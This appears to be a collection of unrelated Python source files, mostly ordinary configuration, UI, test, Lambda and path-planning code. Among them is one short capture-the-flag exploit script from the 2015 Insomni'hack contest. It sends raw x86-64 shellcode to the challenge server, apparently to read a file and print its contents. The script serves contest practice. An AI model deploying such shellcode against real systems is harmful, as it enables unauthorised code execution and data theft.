    db.add_camera(model_id, cam.width, cam.height, cam.params, prior_focal_length=False, camera_id=cam.id)
    img = get_image_model(traj, count, cam.id, "cam/" + time_str + ".png")
    db.add_image(img.name, img.camera_id, prior_q=img.qvec, prior_t=img.tvec, image_id=img.id)
    cam = get_fisheye_camera_model(first_image,i+2)
    model_id = CAMERA_MODEL_NAMES[cam.model].model_id
    db.add_camera(model_id, cam.width, cam.height, cam.params, prior_focal_length=False, camera_id=cam.id)
    # NOTE(review): this re-adds the same `img` record (built for the first
    # camera) rather than one for the fisheye camera -- looks like a
    # copy/paste slip; confirm intent.
    db.add_image(img.name, img.camera_id, prior_q=img.qvec, prior_t=img.tvec, image_id=img.id)
    db.commit()
    print('after insert data to table:')
    cursor = db.cursor()
    cursor.execute("select * from cameras")
    results = cursor.fetchall()
    print('cameras number:', len(results))
    cursor = db.cursor()
    cursor.execute("select * from images")
    results = cursor.fetchall()
    print('images number:', len(results))
    cursor = db.cursor()
    cursor.execute("select * from keypoints")
    results = cursor.fetchall()
    print('keypoints number:', len(results))
    db.close()
    print("Raw Data to database success!")
3348015 | import pytest
import skein
import os
import sys
import time
import subprocess
@pytest.fixture(scope="session")
def conda_env():
    """Pack the current conda env once per session; reuse a cached archive."""
    archive = "dask-yarn-py%d%d.tar.gz" % sys.version_info[:2]
    if not os.path.exists(archive):
        conda_pack = pytest.importorskip("conda_pack")
        conda_pack.pack(output=archive, verbose=True)
    return archive
@pytest.fixture(scope="session")
def skein_client():
    """Session-wide skein client, closed automatically at teardown."""
    with skein.Client() as c:
        yield c
def check_is_shutdown(client, app_id, status="SUCCEEDED"):
    """Poll until the YARN application terminates; assert its final status.

    Kills the application (and fails the test) if it is still running after
    roughly 10 seconds. On an unexpected final status, dumps the YARN logs
    before failing.
    """
    timeleft = 10
    report = client.application_report(app_id)
    while report.state not in ("FINISHED", "FAILED", "KILLED"):
        # Poll every 100 ms; timeleft accumulates small float errors, which is
        # fine for a coarse test timeout.
        time.sleep(0.1)
        timeleft -= 0.1
        report = client.application_report(app_id)
        if timeleft < 0:
            client.kill_application(app_id)
            logs = get_logs(app_id)
            print(
                "Application wasn't properly terminated, killed by test fixture.\n"
                "\n"
                "Application Logs\n"
                "----------------\n"
                "%s" % logs
            )
            assert False, "Application wasn't properly terminated"
    if report.final_status != status:
        logs = get_logs(app_id)
        print(
            "Expected application to terminate with status==%s, got status==%s\n"
            "\n"
            "Application Logs\n"
            "----------------\n"
            "%s" % (status, report.final_status, logs)
        )
    assert report.final_status == status
def get_logs(app_id, tries=3):
    """Fetch the YARN logs for app_id, attempting up to `tries` times total."""
    command = ["yarn", "logs", "-applicationId", app_id]
    for _ in range(tries - 1):
        try:
            return subprocess.check_output(command).decode()
        except Exception:
            time.sleep(1)
    # Final attempt: let any failure propagate to the caller.
    return subprocess.check_output(command).decode()
3240691 |
from gaia_project.communication_layer import LocalCommunicationLayer
from gaia_project.engine import Engine
if __name__ == '__main__':
    # Wire a local (in-process) UI layer to the game engine.
    cl = LocalCommunicationLayer()
    en = Engine(cl)
    # Demo: highlight one hex and refresh graphics before the main loop.
    cl.board.highlight_hex((6,6))
    cl.update_gfx()
    en.run()
| StarcoderdataPython |
279 | import os
# Directory containing this config file; anchors the SQLite paths below.
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
    """Base configuration shared by every environment."""
    DEBUG = False
    SECRET_KEY = os.environ.get('SECRET_KEY', '')
class DevelopmentConfig(Config):
    """Local development: debug on, SQLite database next to this file."""
    DEBUG = True
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'flask_main.db')
class TestingConfig(Config):
    """Test runs: testing flag set, same local SQLite database."""
    DEBUG = True
    TESTING = True
    PRESERVE_CONTEXT_ON_EXCEPTION = False
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'flask_main.db')
class ProductionConfig(Config):
    """Production: debugging disabled."""
    DEBUG = False
# Lookup table mapping environment name -> configuration class.
config_by_name = {
    'dev': DevelopmentConfig,
    'test': TestingConfig,
    'prod': ProductionConfig,
}
key = Config.SECRET_KEY
6443762 | <gh_stars>0
import os
# Server Information (placeholders -- fill in before deploying)
username = '<serverusername>'
password = '<<PASSWORD>>'
ipaddr = '<ipadress>'
port = 22
# Website Information
website = 'amt-tutorial'
htdocsUrl = 'https://www.yoururl.com/' + website
htdocsPath = '/var/www/html/' + website
# BEGIN NEW CODE
# AMT Configuration
# HIT reward is derived from an hourly wage and the expected task duration.
dollarPerHour = 6.00
expTimeMin = 1.0
hitRewardDollar = (expTimeMin / 60.0 ) * dollarPerHour;
turkConfig = {
    'live' : False,
    'questionUrl' : '%s/cgi-bin/turkserv.py' % (htdocsUrl),
    'questionFrameHeight' : 600,
    'hitTitle' : "Identify a letter as rapidly as possible.",
    'hitDescription' : 'Identify a letter as rapidly as possible.',
    'hitKeywords' : "experiment, psychology",
    'hitDurationSec' : 1800,
    'hitRewardDollar' : hitRewardDollar,
    'maxAssignments' : 1,
    # Placeholder AWS credentials -- replace with real ones (never commit them).
    'awsAccessId' : 'AFAKEACCESSKEY',
    'awsSecretKey' : 'AFAKESECRETKEY',
    # Worker qualifications: >=100 approved HITs, >=90% approval, US locale.
    'quals' : [
        ['NumberHitsApprovedRequirement', 'GreaterThanOrEqualTo', 100],
        ['PercentAssignmentsApprovedRequirement', 'GreaterThanOrEqualTo', 90],
        ['LocaleRequirement', 'EqualTo', 'US']
    ]
}
# Sandbox submit endpoint is used unless 'live' is set above.
submitUrl = 'https://www.mturk.com/mturk/externalSubmit' if turkConfig['live'] else \
    'https://workersandbox.mturk.com/mturk/externalSubmit'
# END NEW CODE
# Experiment Configuration
expConfig = {
    'codeVersion' : 'v0',
    'website' : website,
    'htdocsUrl' : htdocsUrl,
    'nTrial' : 10,
    'debugOn' : True,
    'doRecord' : True,
    'submitUrl' : submitUrl,
    'expTimeMin' : expTimeMin
}
| StarcoderdataPython |
9638053 | <filename>view/gererActions.py<gh_stars>0
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gererActions.ui'
#
# Created by: PyQt5 UI code generator 5.10.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_DialogGererActions(object):
    """Auto-generated (pyuic5) UI for the "manage steps" dialog.

    NOTE: regenerate from gererActions.ui rather than editing by hand --
    the pyuic5 header warns that manual changes will be lost.
    """
    def setupUi(self, DialogGererActions):
        """Create and lay out all widgets on the given dialog."""
        DialogGererActions.setObjectName("DialogGererActions")
        DialogGererActions.resize(578, 505)
        DialogGererActions.setMinimumSize(QtCore.QSize(578, 505))
        DialogGererActions.setMaximumSize(QtCore.QSize(578, 505))
        DialogGererActions.setSizeGripEnabled(True)
        DialogGererActions.setModal(True)
        self.listeEtape = QtWidgets.QListView(DialogGererActions)
        self.listeEtape.setGeometry(QtCore.QRect(90, 20, 471, 261))
        self.listeEtape.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
        self.listeEtape.setWordWrap(True)
        self.listeEtape.setObjectName("listeEtape")
        self.horizontalLayoutWidget = QtWidgets.QWidget(DialogGererActions)
        self.horizontalLayoutWidget.setGeometry(QtCore.QRect(13, 281, 551, 181))
        self.horizontalLayoutWidget.setObjectName("horizontalLayoutWidget")
        self.layoutEtape = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)
        self.layoutEtape.setContentsMargins(0, 0, 0, 0)
        self.layoutEtape.setObjectName("layoutEtape")
        self.layoutSaisie = QtWidgets.QFormLayout()
        self.layoutSaisie.setObjectName("layoutSaisie")
        self.labelOrdre = QtWidgets.QLabel(self.horizontalLayoutWidget)
        self.labelOrdre.setObjectName("labelOrdre")
        self.layoutSaisie.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.labelOrdre)
        self.textOrdre = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
        self.textOrdre.setObjectName("textOrdre")
        self.layoutSaisie.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.textOrdre)
        self.labelEtape = QtWidgets.QLabel(self.horizontalLayoutWidget)
        self.labelEtape.setObjectName("labelEtape")
        self.layoutSaisie.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.labelEtape)
        self.textEtape = QtWidgets.QTextEdit(self.horizontalLayoutWidget)
        self.textEtape.setObjectName("textEtape")
        self.layoutSaisie.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.textEtape)
        self.inputDate = QtWidgets.QDateTimeEdit(self.horizontalLayoutWidget)
        self.inputDate.setCalendarPopup(True)
        self.inputDate.setObjectName("inputDate")
        self.layoutSaisie.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.inputDate)
        self.buttonAjouterModifier = QtWidgets.QPushButton(self.horizontalLayoutWidget)
        self.buttonAjouterModifier.setObjectName("buttonAjouterModifier")
        self.layoutSaisie.setWidget(4, QtWidgets.QFormLayout.SpanningRole, self.buttonAjouterModifier)
        self.checkBoxDate = QtWidgets.QCheckBox(self.horizontalLayoutWidget)
        self.checkBoxDate.setObjectName("checkBoxDate")
        self.layoutSaisie.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.checkBoxDate)
        self.labelDate = QtWidgets.QLabel(self.horizontalLayoutWidget)
        self.labelDate.setObjectName("labelDate")
        self.layoutSaisie.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.labelDate)
        self.layoutEtape.addLayout(self.layoutSaisie)
        self.verticalFait = QtWidgets.QVBoxLayout()
        self.verticalFait.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
        self.verticalFait.setContentsMargins(0, -1, -1, -1)
        self.verticalFait.setObjectName("verticalFait")
        self.horizontalLayoutFait = QtWidgets.QHBoxLayout()
        self.horizontalLayoutFait.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
        self.horizontalLayoutFait.setObjectName("horizontalLayoutFait")
        self.labelFait = QtWidgets.QLabel(self.horizontalLayoutWidget)
        self.labelFait.setObjectName("labelFait")
        self.horizontalLayoutFait.addWidget(self.labelFait)
        self.labelFaitValue = QtWidgets.QLabel(self.horizontalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.labelFaitValue.setFont(font)
        self.labelFaitValue.setObjectName("labelFaitValue")
        self.horizontalLayoutFait.addWidget(self.labelFaitValue)
        self.verticalFait.addLayout(self.horizontalLayoutFait)
        self.buttonChangerEtat = QtWidgets.QPushButton(self.horizontalLayoutWidget)
        self.buttonChangerEtat.setObjectName("buttonChangerEtat")
        self.verticalFait.addWidget(self.buttonChangerEtat)
        self.layoutEtape.addLayout(self.verticalFait)
        self.buttonDialog = QtWidgets.QDialogButtonBox(DialogGererActions)
        self.buttonDialog.setGeometry(QtCore.QRect(13, 468, 551, 31))
        self.buttonDialog.setOrientation(QtCore.Qt.Horizontal)
        self.buttonDialog.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
        self.buttonDialog.setObjectName("buttonDialog")
        self.buttonMonter = QtWidgets.QPushButton(DialogGererActions)
        self.buttonMonter.setGeometry(QtCore.QRect(10, 20, 71, 23))
        self.buttonMonter.setObjectName("buttonMonter")
        self.buttonDescendre = QtWidgets.QPushButton(DialogGererActions)
        self.buttonDescendre.setGeometry(QtCore.QRect(10, 80, 71, 23))
        self.buttonDescendre.setObjectName("buttonDescendre")
        self.buttonSupprimer = QtWidgets.QPushButton(DialogGererActions)
        self.buttonSupprimer.setGeometry(QtCore.QRect(10, 50, 71, 23))
        self.buttonSupprimer.setObjectName("buttonSupprimer")
        self.retranslateUi(DialogGererActions)
        self.buttonDialog.accepted.connect(DialogGererActions.accept)
        self.buttonDialog.rejected.connect(DialogGererActions.reject)
        QtCore.QMetaObject.connectSlotsByName(DialogGererActions)
    def retranslateUi(self, DialogGererActions):
        """Set all user-visible (translatable) strings."""
        _translate = QtCore.QCoreApplication.translate
        DialogGererActions.setWindowTitle(_translate("DialogGererActions", "Gérer les étapes"))
        self.labelOrdre.setText(_translate("DialogGererActions", "Ordre"))
        self.labelEtape.setText(_translate("DialogGererActions", "Etape"))
        self.buttonAjouterModifier.setText(_translate("DialogGererActions", "Editer"))
        self.checkBoxDate.setText(_translate("DialogGererActions", "Rajouter une date d\'éxécution"))
        self.labelDate.setText(_translate("DialogGererActions", "Date"))
        self.labelFait.setText(_translate("DialogGererActions", "Etat : "))
        self.labelFaitValue.setText(_translate("DialogGererActions", "A faire"))
        self.buttonChangerEtat.setText(_translate("DialogGererActions", "Inverser l\'état"))
        self.buttonMonter.setText(_translate("DialogGererActions", "Monter"))
        self.buttonDescendre.setText(_translate("DialogGererActions", "Descendre"))
        self.buttonSupprimer.setText(_translate("DialogGererActions", "Supprimer"))
11218916 | <filename>rest_rpc/training/core/hypertuners/abstract.py
#!/usr/bin/env python
####################
# Required Modules #
####################
# Generic/Built-in
import abc
import logging
from typing import Dict
# Libs
# Custom
##################
# Configurations #
##################
########################################
# Abstract Tuner Class - AbstractTuner #
########################################
class AbstractTuner(abc.ABC):
    """Interface that every hyperparameter tuner implementation must satisfy."""

    @abc.abstractmethod
    def tune(self):
        """Run federated training, using a pre-specified model as a template,
        across initialised worker nodes coordinated by a TTP node, over a
        specified range of hyperparameters, to obtain optimal performance.
        """
| StarcoderdataPython |
5177184 | ### Title: Format BibTex file
### Author: <NAME>
### Created: 2019-10-29
### Modified: 2019-11-04
### USAGE:
### python formatBibFile.py IN_FILE OUT_FILE
### ARGS:
### IN_FILE = Absolute or relative path (including file name and extension)
### to the file to be formatted
### OUT_FILE = Absolute or relative path (including file name and extension)
### to the file to be produced
import sys
import modBibFiles as mbf
## Extract command line arguments:
args = sys.argv

## Add annotations to BibTex file:
# NOTE(review): no argument-count check -- running without IN_FILE/OUT_FILE
# raises IndexError instead of printing the usage described in the header.
mbf.formatBib(iFile = args[1], oFile = args[2])
| StarcoderdataPython |
116000 | <filename>tasks_sprints_12/d_caring_mother.py
# <NAME>
# ID успешной посылки 65663041
class Node:
    """Singly linked list node."""

    def __init__(self, value, next_item=None):
        self.value = value          # payload stored in this node
        self.next_item = next_item  # following Node, or None at the tail
def solution(node, elem):
    """Return the 0-based position of the first node whose value equals elem.

    Returns -1 when elem is not present. Unlike the original, an empty list
    (node is None) also yields -1 instead of raising AttributeError; found
    and not-found results are unchanged. The original's loop also re-tested
    `node.value != elem` redundantly inside the loop body.
    """
    index = 0
    while node is not None:
        if node.value == elem:
            return index
        index += 1
        node = node.next_item
    return -1
def test():
    """Smoke test: build a 4-node list and search it."""
    node3 = Node("node3", None)
    node2 = Node("node2", node3)
    node1 = Node("node1", node2)
    node0 = Node("node0", node1)
    solution(node0, "node4")
    # "node4" is not in the list, so solution() returns -1 here.
    # NOTE(review): the original comment claimed "result is idx == 2", which
    # would match searching for "node2" instead -- confirm intent.
if __name__ == '__main__':
    # Run the smoke test when executed directly.
    test()
| StarcoderdataPython |
3497701 | <filename>insomni'hack-2015/shellcoding/bluepill/exploit.py<gh_stars>1-10
import socket
s=socket.create_connection(('bluepill.insomni.hack', 4444))
print s.recv(4096)
# x86-64 shellcode. NOTE(review): appears to start with a jmp/call-pop decoder
# stub followed by read/write/exit syscalls and a trailing marker string --
# exact semantics not verified here.
sh="\xeb\x3f\x5f\x80\x77\x1c\x42\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x74\x68\x69\x73\x69\x73\x61\x76\x65\x72\x79\x72\x61\x6e\x64\x6f\x6d\x6e\x61\x6d\x65\x61\x6d\x69\x72\x69\x74\x65\x42"
payload = "\x87\xd6"
# presumably a 2-byte header expected by the service, then a short relative
# jump into the shellcode -- TODO confirm against the challenge binary.
payload += "\xeb\xd4"
payload += sh
# Keep a local copy of the exact bytes sent, for debugging.
open('payload', 'w').write(payload)
s.send(payload)
print s.recv(4096)
| StarcoderdataPython |
1751515 | import gzip
import json
import base64
import logging
from datetime import datetime
import re
from typing import Any
import boto3
# Set up logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)

# AWS handles are created at import time so Lambda reuses them across warm
# invocations; region and table name are hard-coded for this deployment.
ec2_resource = boto3.resource('ec2', region_name='us-west-2')
table = boto3.resource('dynamodb', region_name='us-west-2').Table('XGBoostCIWorkerProvisionRecord')
def get_os_of_ami(image_id: str) -> str:
    """Return 'Linux' or 'Windows' for the AMI's platform_details.

    Raises ValueError on an unrecognized platform (the original used
    `assert`, which is silently stripped under `python -O`).
    """
    image = ec2_resource.Image(image_id)
    platform_details = image.platform_details
    if platform_details not in ('Linux/UNIX', 'Windows'):
        raise ValueError(f'Unexpected platform_details: {platform_details!r}')
    if platform_details == 'Linux/UNIX':
        return 'Linux'
    return platform_details
def _extract_instance_items(message):
    """Return the EC2 items list from an API-call message, or None when the
    response is missing/empty (i.e. the API call did not succeed)."""
    response = message.get('responseElements')
    if not response:
        return None
    instances = response.get('instancesSet')
    if not instances:
        return None
    if 'items' not in instances:
        return None
    return instances['items']
def lambda_handler(event: Any, context: Any):
    """Record EC2 RunInstances/TerminateInstances CloudTrail events into
    DynamoDB. Events arrive via a CloudWatch Logs subscription, base64-encoded
    and gzip-compressed.

    Refactor: the two event branches shared ~80% of their logic (deeply nested
    well-formedness checks and the put_item scaffolding); that duplication is
    now factored into _extract_instance_items and a single loop.
    """
    cw_data = event['awslogs']['data']
    payload = json.loads(gzip.decompress(base64.b64decode(cw_data)))
    for log_event in payload['logEvents']:
        message = json.loads(log_event['message'])
        if 'eventType' not in message:
            logger.debug(f'Message not well-formed: {message}')
            continue
        if message['eventType'] != 'AwsApiCall':
            # Skip events that are not API calls, such as Insights
            continue
        if ('eventName' not in message) or ('eventTime' not in message):
            logger.debug(f'Message not well-formed: {message}')
            continue
        event_name = message['eventName']
        event_time = message['eventTime']
        if event_name not in ('RunInstances', 'TerminateInstances'):
            continue
        items = _extract_instance_items(message)
        if items is None:
            # The API call did not succeed; nothing to record.
            continue
        date = event_time.split(sep='T', maxsplit=1)[0]
        for ordinal, ec2 in enumerate(items):
            ec2_id = ec2['instanceId']
            logger.info(f'{event_name}, InstanceID = {ec2_id} @ {event_time}')
            item = {
                'Date': date,
                'Timestamp-Ordinal': f'{event_time}#{ordinal}',
                'EventName': event_name,
                'InstanceID': ec2_id,
            }
            if event_name == 'RunInstances':
                # Only launches carry instance type / OS information.
                item['InstanceType'] = ec2['instanceType']
                item['InstanceOS'] = get_os_of_ami(ec2['imageId'])
            table.put_item(Item=item)
| StarcoderdataPython |
11371029 | # Generated by Django 3.1.3 on 2021-08-20 17:02
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: add nullable `accuracy` and `symptom` CharFields to
    pic.Model_image."""
    dependencies = [
        ('pic', '0002_auto_20210820_1020'),
    ]
    operations = [
        migrations.AddField(
            model_name='model_image',
            name='accuracy',
            field=models.CharField(max_length=20, null=True),
        ),
        migrations.AddField(
            model_name='model_image',
            name='symptom',
            field=models.CharField(max_length=20, null=True),
        ),
    ]
| StarcoderdataPython |
11352620 | <reponame>bbueno5000/path_planning_demo_live<gh_stars>0
"""
We're gonna take a 10 x 10 grid of squares.
Obstacles are black squares.
Objects defined by shape, size, color.
Each square gets an x, y coordinate.
Return list of occupied grids using computer vision.
Find minimimum path between starting object and matching object using a star search.
"""
import cv2
import numpy
import skimage.metrics
import time
class ProcessImage:
    """Grid-maze path planner over a 10x10 image of 60x60-pixel squares.

    main() classifies each square (free / occupied / obstacle) by average
    color, matches visually similar colored squares via SSIM, and connects
    matches with astar(). Methods take no `self` and are invoked as
    ProcessImage.<name>(...), i.e. they behave as static methods.
    """
    def main(image_filename):
        """Returns:
        - List of tuples which is the coordinates for occupied grid.
        - Dictionary with information of path.
        """
        occupied_grids = []
        planned_path = {}
        image = cv2.imread(image_filename)
        (winW, winH) = (60, 60)
        obstacles = []
        # 1-based (row-ish, col-ish) index of the current 60x60 window.
        index = [1, 1]
        blank_image = numpy.zeros((60, 60, 3), numpy.uint8)
        list_images = [[blank_image for i in range(10)] for i in range(10)]
        maze = [[0 for i in range(10)] for i in range(10)]
        for (x, y, window) in ProcessImage.sliding_window(image, stepSize=60, windowSize=(winW, winH)):
            if window.shape[0] != winH or window.shape[1] != winW:
                continue
            clone = image.copy()
            cv2.rectangle(clone, (x, y), (x + winW, y + winH), (0, 255, 0), 2)
            crop_img = image[x:x+winW, y:y+winH]
            list_images[index[0]-1][index[1]-1] = crop_img.copy()
            average_color_per_row = numpy.average(crop_img, axis=0)
            average_color = numpy.average(average_color_per_row, axis=0)
            average_color = numpy.uint8(average_color)
            # Any channel <= 240: the square is not blank (occupied).
            if any(i <= 240 for i in average_color):
                maze[index[1]-1][index[0]-1] = 1
                occupied_grids.append(tuple(index))
            # Any channel <= 20: the square is (near-)black, i.e. an obstacle.
            if any(i <= 20 for i in average_color):
                obstacles.append(tuple(index))
            cv2.imshow('Window', clone)
            cv2.waitKey(1)
            time.sleep(0.025)
            index[1] = index[1] + 1
            if index[1] > 10:
                index[0] = index[0] + 1
                index[1] = 1
        # Colored objects = occupied squares that are not black obstacles.
        list_colored_grids = [n for n in occupied_grids if n not in obstacles]
        for startimage in list_colored_grids:
            key_startimage = startimage
            img1 = list_images[startimage[0]-1][startimage[1]-1]
            for grid in [n for n in list_colored_grids if n != startimage]:
                img = list_images[grid[0]-1][grid[1]-1]
                image = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
                image2 = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
                # SSIM > 0.9 treated as "same object appearance".
                s = skimage.metrics.structural_similarity(image, image2)
                if s > 0.9:
                    result = ProcessImage.astar(
                        maze, (startimage[0]-1, startimage[1]-1), (grid[0]-1, grid[1]-1))
                    # Convert 0-based path cells back to 1-based grid indices
                    # and drop the start/end cells.
                    list2 = []
                    for t in result:
                        x, y = t[0], t[1]
                        list2.append(tuple((x + 1, y + 1)))
                    result = list(list2[1:-1])
                    if not result:
                        planned_path[startimage] = list(['NO PATH', [], 0])
                    # NOTE(review): this line runs unconditionally, so the
                    # 'NO PATH' entry above is immediately overwritten --
                    # looks like it belongs in an else branch; confirm.
                    planned_path[startimage] = list([str(grid), result, len(result)+1])
        for obj in list_colored_grids:
            if obj not in planned_path:
                planned_path[obj] = list(['NO MATCH', [], 0])
        return occupied_grids, planned_path
    def astar(m, startp, endp):
        """A* Search algorithm implementation to find the minimum path between 2 points.

        Nodes are lists/tuples [parent, x, y, cost, cost+heuristic]. The open
        list (misleadingly named closeList) is kept heap-ordered on insert via
        sift-up, but pop(0) does not re-heapify, so ordering -- and therefore
        path optimality -- is only approximate. NOTE(review): documented
        as-is; not changed to preserve existing outputs.
        """
        w, h = 10, 10
        sx, sy = startp
        ex, ey = endp
        node = [None, sx, sy, 0, abs(ex-sx)+abs(ey-sy)]
        closeList = [node]
        createdList = {}
        createdList[sy*w+sx] = node
        k=0
        while(closeList):
            node = closeList.pop(0)
            x = node[1]
            y = node[2]
            l = node[3] + 1
            k += 1
            # NOTE(review): k is incremented before this test, so the else
            # branch below is unreachable dead code.
            if k != 0:
                neighbours = ((x, y+1), (x, y-1), (x+1, y), (x-1, y))
            else:
                neighbours = ((x+1, y), (x-1, y), (x, y+1), (x, y-1))
            for nx,ny in neighbours:
                if nx==ex and ny==ey:
                    # Goal reached: walk parent links back to the start.
                    path = [(ex, ey)]
                    while node:
                        path.append((node[1], node[2]))
                        node = node[0]
                    return list(reversed(path))
                if 0 <= nx < w and 0 <= ny < h and m[ny][nx] == 0:
                    if ny * w + nx not in createdList:
                        nn = (node, nx, ny, l, l+abs(nx-ex)+abs(ny-ey))
                        createdList[ny*w+nx] = nn
                        # Sift the new node up the binary-heap ordering.
                        nni = len(closeList)
                        closeList.append(nn)
                        while nni:
                            i = (nni-1) >> 1
                            if closeList[i][4] > nn[4]:
                                closeList[i], closeList[nni] = nn, closeList[i]
                                nni = i
                            else:
                                break
        # Open list exhausted without reaching the goal: no path.
        return list()
    def sliding_window(image, stepSize, windowSize):
        """Traversing through the image to perform image processing

        Yields (x, y, window) for each stepSize-strided windowSize crop.
        """
        for y in range(0, image.shape[0], stepSize):
            for x in range(0, image.shape[1], stepSize):
                yield (x, y, image[y: y+windowSize[1], x: x+windowSize[0]])
if __name__ == '__main__':
    # Demo run on a bundled sample image; prints occupancy grid and paths.
    occupied_grids, planned_path = ProcessImage.main('data\\input\\image_4.jpg')
    print('Occupied Grid:')
    print(occupied_grids)
    print('Planned Path:')
    print(planned_path)
| StarcoderdataPython |
1757709 | <reponame>heatherleaf/sparv-pipeline
from sparv import Config, SourceStructureParser, wizard
# Configuration keys declared by the export module; each Config entry only
# registers the key and its description (values come from the corpus config).
__config__ = [
    Config("export.default", description="List of exporters to use by default"),
    Config("export.annotations", description="List of automatic annotations to include in export"),
    Config("export.source_annotations", description="List of annotations and attributes from the source to include"),
    Config("export.header_annotations", description="List of headers from the source data to include"),
    Config("export.word", description="Annotation to use as token text in export"),
    Config("export.remove_module_namespaces",
           description="Remove module name prefixes from annotation names in export"),
    Config("export.sparv_namespace", description="Prefix to add to the names of all automatically created annotations"),
    Config("export.source_namespace", description="Prefix to add to the names of all annotations from source"),
    Config("export.scramble_on", description="What annotation to use as the smallest unit when scrambling")
]
@wizard(["export.source_annotations"], source_structure=True)
def import_wizard(answers, structure: SourceStructureParser):
    """Return wizard for selecting what source annotations to keep."""
    # First question: keep all, whitelist, or blacklist source annotations.
    mode_question = {
        "type": "select",
        "name": "_keep_source",
        "message": "What existing annotations from the source files do you want to keep?",
        "choices": [
            {"name": "All of them", "value": "all", "short": "All"},
            {"name": "Some of them; I’ll list which ones I want to keep.", "value": "whitelist",
             "short": "Keep some"},
            {"name": "Most of them; I’ll list which ones to exclude.", "value": "blacklist",
             "short": "Discard some"}
            # {"name": "None of them; Do not choose this if you want to export to XML!", "value": []}
        ]
    }
    # Shown only when "whitelist" was selected; choices are resolved lazily.
    whitelist_question = {
        "when": lambda x: x.get("_keep_source") == "whitelist",
        "type": "checkbox",
        "name": "export.source_annotations",
        "message": "Select the annotations to keep:",
        "choices": structure.get_annotations
    }
    # Shown only when "blacklist" was selected; each choice is negated.
    blacklist_question = {
        "when": lambda x: x.get("_keep_source") == "blacklist",
        "type": "checkbox",
        "name": "export.source_annotations",
        "message": "Select the annotations to exclude:",
        "choices": [{"name": annotation, "value": f"not {annotation}"}
                    for annotation in structure.get_annotations(answers)]
    }
    return [mode_question, whitelist_question, blacklist_question]
| StarcoderdataPython |
5153353 | #!/usr/bin/env python
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import datetime
import hashlib
import logging
import sys
import unittest
import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from test_support import test_case
from server import bot_management
_VERSION = hashlib.sha256().hexdigest()
class BotManagementTest(test_case.TestCase):
  """Unit tests for server.bot_management (Python 2 / GAE ndb code)."""
  def test_all_apis_are_tested(self):
    actual = frozenset(i[5:] for i in dir(self) if i.startswith('test_'))
    # Contains the list of all public APIs.
    expected = frozenset(
        i for i in dir(bot_management)
        if i[0] != '_' and hasattr(getattr(bot_management, i), 'func_name'))
    missing = expected - actual
    self.assertFalse(missing)
  def test_dimensions_to_flat(self):
    self.assertEqual(
        ['a:b', 'c:d'], bot_management.dimensions_to_flat({'a': 'b', 'c': 'd'}))
  def test_bot_event(self):
    # connected.
    now = datetime.datetime(2010, 1, 2, 3, 4, 5, 6)
    self.mock_now(now)
    bot_management.bot_event(
        event_type='bot_connected', bot_id='id1',
        external_ip='8.8.4.4', authenticated_as='bot:id1.domain',
        dimensions={'id': ['id1'], 'foo': ['bar']}, state={'ram': 65},
        version=hashlib.sha256().hexdigest(), quarantined=False, task_id=None,
        task_name=None)
    expected = {
      'authenticated_as': u'bot:id1.domain',
      'composite': [32, 8, 2],
      'dimensions': {u'foo': [u'bar'], u'id': [u'id1']},
      'external_ip': u'8.8.4.4',
      'first_seen_ts': now,
      'id': 'id1',
      'last_seen_ts': now,
      'lease_id': None,
      'lease_expiration_ts': None,
      'machine_type': None,
      'quarantined': False,
      'state': {u'ram': 65},
      'task_id': None,
      'task_name': None,
      'version': _VERSION,
    }
    self.assertEqual(
        expected, bot_management.get_info_key('id1').get().to_dict())
  def test_get_events_query(self):
    now = datetime.datetime(2010, 1, 2, 3, 4, 5, 6)
    self.mock_now(now)
    bot_management.bot_event(
        event_type='bot_connected', bot_id='id1',
        external_ip='8.8.4.4', authenticated_as='bot:id1.domain',
        dimensions={'id': ['id1'], 'foo': ['bar']}, state={'ram': 65},
        version=hashlib.sha256().hexdigest(), quarantined=False, task_id=None,
        task_name=None)
    expected = [
      {
        'authenticated_as': u'bot:id1.domain',
        'dimensions': {u'foo': [u'bar'], u'id': [u'id1']},
        'event_type': u'bot_connected',
        'external_ip': u'8.8.4.4',
        'lease_id': None,
        'lease_expiration_ts': None,
        'machine_type': None,
        'message': None,
        'quarantined': False,
        'state': {u'ram': 65},
        'task_id': None,
        'ts': now,
        'version': _VERSION,
      },
    ]
    self.assertEqual(
        expected,
        [i.to_dict() for i in bot_management.get_events_query('id1', True)])
  def test_bot_event_poll_sleep(self):
    now = datetime.datetime(2010, 1, 2, 3, 4, 5, 6)
    self.mock_now(now)
    bot_management.bot_event(
